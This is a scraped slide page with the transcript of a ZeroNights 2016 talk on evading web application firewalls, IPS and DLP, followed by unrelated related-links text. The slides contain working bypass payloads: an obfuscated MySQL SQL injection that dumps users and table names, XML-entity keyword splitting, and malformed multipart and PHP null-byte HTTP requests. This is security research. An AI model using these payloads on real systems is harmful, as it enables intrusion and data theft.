Upload File

zeronights 2016 | a blow under the belt. how to avoid waf/ips/dlp | Удар ниже пояса....

  • Home
  • Technology
  • Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP
31
ZeroNights 2016

Upload: -

Post on 09-Jan-2017

1.048 views

Category:

Technology


0 download

Report

TRANSCRIPT

Page 1: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

ZeroNights 2016

Page 2: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

Whoami

Anton “Bo0oM” Lopanitsyn

● security researcher

● whitehat

● bug bounty practicant

● JBFC member

Page 3: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP
Page 4: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP
Page 5: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP
Page 6: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

Types of bypasses

Protocol parsing (HTTP, WS, ...) Data parsers

(Base64, XML, JSON, ...)

Detection logic

Page 7: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

Detection logic, bla-bla-bla1 UNION select@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO $ fRom(SeLEct@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO frOM`information_schema`.`triggers`)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO WHere !FAlSE||tRue&&FalSe||FalsE&&TrUE like TruE||FalSE union/*!98765select@000OO0O0OooOoO0OOoooOOoOooo0o0o:=grOup_cONcaT(`username`)``from(users)whErE(username)like'admin'limit 1*/select@000OO0O0OooOoO0OOoooO0oOooo0o0o limit 1,0 UnION SeleCt(selEct(sELecT/*!67890sELect@000OO0O0O0oOoO0OOoooOOoOooo0o0o:=group_concat(`table_name`)FrOM information_schema.statistics WhERE TABLe_SCHEmA In(database())*//*!@000OO0O0OooOoO0OOoooO0oOooo0o0o:=gROup_conCat(/*!taBLe_naME)*/fRoM information_schema.partitions where TABLe_SCHEma not in(concat((select insert(insert((select (collation_name)from(information_schema.collations)where(id)=true+true),true,floor(pi()),trim(version()from(@@version))),floor(pi()),ceil(pi()*pi()),space(0))), conv((125364/(true-!true))-42351, ceil(pi()*pi()),floor(pow(pi(),pi()))),mid(aes_decrypt(aes_encrypt(0x6175746F6D6174696F6E,0x4C696768744F53),0x4C696768744F53)FROM floor(version()) FOR ceil(version())),rpad(reverse(lpad(collation(user()),ceil(pi())--@@log_bin,0x00)),! !true,0x00),CHAR((ceil(pi())+!false)*ceil((pi()+ceil(pi()))*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--ceil(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--floor(pi()*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-floor(pi()))),0x6d7973716c))from(select--(select~0x7))0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO)from(select@/*!/*!$*/from(select+3.``)000oOOO0Oo0OOooOooOoO00Oooo0o0oO)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO/*!76799sElect@000OO0O0OooOoO00Oooo0OoOooo0o0o:=group_concat(`user`)``from`mysql.user`WHeRe(user)=0x726f6f74*/#(SeLECT@ uNioN sElEcT AlL group_concat(cOLumN_nAME,1,1)FroM InFoRMaTioN_ScHemA.COLUMNS where taBle_scHema not in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c)UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@000OO0O0OooOoO0OOoooO0oOooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO)

Page 8: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

Data parsers

<?xml version="1.0" encoding="utf-8"?><bla></bla><data>&lt;?xml version="1.0" encoding="utf-8"&gt;&lt;!ENTITY XXE Attack&gt;&lt;bla&gt;&lt;/bla&gt;</data><bla></bla>

Page 9: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

Data parsers

<?xml version="1.0" encoding="UTF-8"?><!ENTITY a "UNI"><!ENTITY b "SELE"><!ENTITY c "pass"><!ENTITY d "FR"><!ENTITY e "admins"><!ENTITY f "WHE"><authorid>-1 OR &a;ON &b;CT &c;wd &d;OM &e; &f;RE id=1</authorid>

Page 10: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

HTTP requests & HTTP parsers

Page 11: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

Content-type: multipart/form-data, boundary=AaB03x

--AaB03xcontent-disposition: form-data; name="field1"

Joe Blow--AaB03xcontent-disposition: form-data; name="pics"; filename="file1.txt"Content-Type: text/plain

... contents of file1.txt ...--AaB03x--

Multipart

Page 12: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

POST /hello HTTP/1.1Content-Type: application/x-www-form-urlencoded

param=Attack

POST /hello HTTP/1.1Content-type: multipart/form-data, boundary=AaB03x

--AaB03xcontent-disposition: form-data; name="param"Attack

Page 13: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

Content-Disposition: form-data; name="param"text"text"'test';

Content-Disposition: form-data; name=”param

Content-Disposition: form-data; name=param

Content-Disposition: attachment; name=param

Content-Disposition: name=param

Content-disposition trick

Page 14: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

Content-Disposition:attachment;name=param

Attack!

Content-Disposition tricks

Page 15: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP
Page 16: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

POST / HTTP/1.1Content-Type: multipart/form-data; boundaryContent-Type: multipart/form-data; boundary=TestContent-Type: multipart/form-data; boundary

--TestContent-Disposition: form-data; name=param

Attack

Headers tricks

Page 17: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

POST / HTTP/1.1Content-Type: multipart/form-data; boundaryContent-Type: multipart/form-data; boundary=Content-Type: multipart/form-data; boundary

--Content-Disposition: form-data; name=param

Attack

Headers tricks

Page 18: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

Headers tricks. RFC? What is RFC?POST / HTTP/1.1Content-Type: multipart/form-data; xxxboundaryxxx=Test; boundary=hello;

--TestContent-Disposition: form-data; name=param

Attack

Page 19: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP
Page 20: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

Content-Type: multipart/form-data; boundary=ggContent-Type: multipart/form-data; boundary=ggg

Content-Type: multipart/form-data; boundary=ggContent-Type: multipart/form-data; boundary=ggg

Content-Type: multipart/form-data; boundary=gggContent-Type: multipart/form-data; boundary=!ggg

Page 21: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

Content-Encoding: gzip

HTTP compression

Previous tricks ;)

Page 22: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP
Page 23: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP
Page 24: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

PHP + %00

Page 25: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

PHP <3

POST /phpmustdie.php HTTP/1.1Content-Type: multipart/form-data; boundary=Test\x00othertext;

--TestContent-Disposition: form-data; name=param

Attack

Page 26: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

PHP <3

POST /phpmustdie.php HTTP/1.1Content-Type: multipart/form-data; boundary=Test;

--Test\x00othertextContent-Disposition: form-data; name=param

Attack

Page 27: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

PHP <3

POST /phpmustdie.php HTTP/1.1Content-Type: multipart/form-data; boundary=Test;

--TestContent-Disposition: form-data; name=param

Attack\x00othertext

Page 28: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

POST /hello HTTP/1.1Foo: barFoo: bar...Foo: barFoo: barContent-Type: application/x-www-form-urlencoded

param=Attack

Page 29: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

POST /hello HTTP/1.1Content-Type: application/x-www-form-urlencoded

param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*(8kb)’ union select from ...

Page 30: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP
Page 31: Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

Anton “Bo0oM” Lopanitsyn

https://bo0om.ru

[email protected]

@i_bo0om ?

https://bo0om.ru/

Integrate Imperva WAF - Netsurion

IPS A IPS B IPS C IPS D IPS E - Jetmarine: volvo penta

Waf bypassing Techniques

Cyberoam Waf Presentation

Securing)your)Applica0ons)&)Data) - OWASP_Data... · Slide)26) DoS Protection Behavioral Analysis IP Rep. IPS WAF T WN Large volume network flood attacks XSS, Brute force OS Commanding

FINALE - IBM Cloud (k)Now - S.Riccetti documentazione · WAF Encryption Unique user IDs Anti-virus Monitoring/IDS/IPS Patch/vulnerability management Physical access control ... With

Anatomy of a DDoS attack - datashepherd.co.uk€¦ · protect his website. His DDoS protection, IPS/WAF, and servers were not functioning. Worse, his security solution providers were

Issa Waf 03052007x

Fast Forward - QCon · Wall-E Rate Limit IP Blacklist Authentication Authorization SigSci WAF Schema Check Schema Check Sec Headers DLP Pre-Filters Post-Filters. Results ... Per-app

Application Whitelisting and Active Analysisilta.personifycloud.com/webfiles/productfiles/1877999/... · 2014. 6. 11. · – Firewalls, DPI, IDS/IPS, DLP, Email/Web Scanning, Detonation

Waf Calgary 2008

Presentazione waf nov011 def

Web Application Firewalls (WAF)

Web Application Firewalls (WAF) - OWASP · Liste les fonctionnalités possibles d’un WAF et non les fonctions minimum nécessaires d’un WAF Permet d’évaluer techniquement le

Website Purpose/Reintjes/Work Boats WAF 234… · WAF series Reverse-reduction gear for propulsion with ... WAF 6745- 6765 LAF 6745- 6765 WAF 7740- ... box . suadxa . Created Date:

Swordfish WAF Brochure

Olympics & ICT -  · 2016. 2. 5. · DDos IPS SDC Public Zone Private Zone Back bone 40G 100TB Backup 100TB Backup Back bone 40G WAF WAF WAFWAF CHP CHS DDos IPS DMZ Zone Trusted Zone

World Armwrestling Federation (WAF) Rules of …waf-armwrestling.com/wp-content/uploads/2014/10/85... · World Armwrestling Federation (WAF) Rules of Armwrestling Sitdown and Standing

Waf Bypassing by Rafaybaloch

Exam Overview…CIDR and subnetting (IPv4 and IPv6). IPv6 transition challenges. Generic solutions for network security features, including WAF, IDS, IPS, DDoS protection, and economic

LG DLP PROJECTORLG DLP PROJECTOR

Appxcel Waf Ug

IXIA Visibility Fabric - amasol.de• Centralized Management Virtual Datacenter Visibility Traffic Analysis Physical End Point Tools IPS/IDS DLP vTAP Service vGSC Netflow / Full Packets

hello waf, hello phoenix

20100114 Waf V0.7

OWASP Atlanta Chapter Meeting · OWASP Filter Evasion Why? Cybercriminals are using evasion techniques Targets are relying on IPS/WAF/Firewalls Filter shortcomings need to be identified

Netscaler WAF XSS

WatchGuard Security Solutions - adventus.lv Anti Virus URL Filtering Anti Spam IPS APP Control DLP XTM In-house Unaddressed 6. WatchGuardGateway AntiVirus (Антивирус Шлюза

NGFW numbers (IPS, Application Control, DLP)

Who am I? Past: Commercial WAF developer since 2007 ModSecurity maintainer 2007 – 2010 IDS/IPS Developer (OISF Suricata) Present: Lead WAF development

WAF AGAINST APPOCALYPSE

AWS WAF - API Reference · AWS WAF API Reference ... 540 SqlInjectionMatchSet.....541 SqlInjectionMatchSetSummary

ZERONIGHTS 2016 PROGRAM · A blow under the belt. How to avoid WAF/IPS/DLP Anton Lopanitzyn Monitoring and analysis of emails or a primitive tool to detect a cyber attack Alexey Karyabkin

Pragmatic Network Security Management€¦ · Network Security Management The Demise of Network Security Has Been Greatly Exaggerated DLP, IPS, NGFW, WAF. Chief Information Security

The 2019 Threat Landscape - Amazon Web Services€¦ · AntiVirus Application Control DLP Reputation Enabled Defense Packet Application Control Filtering Web Blocker IPS APT Blocker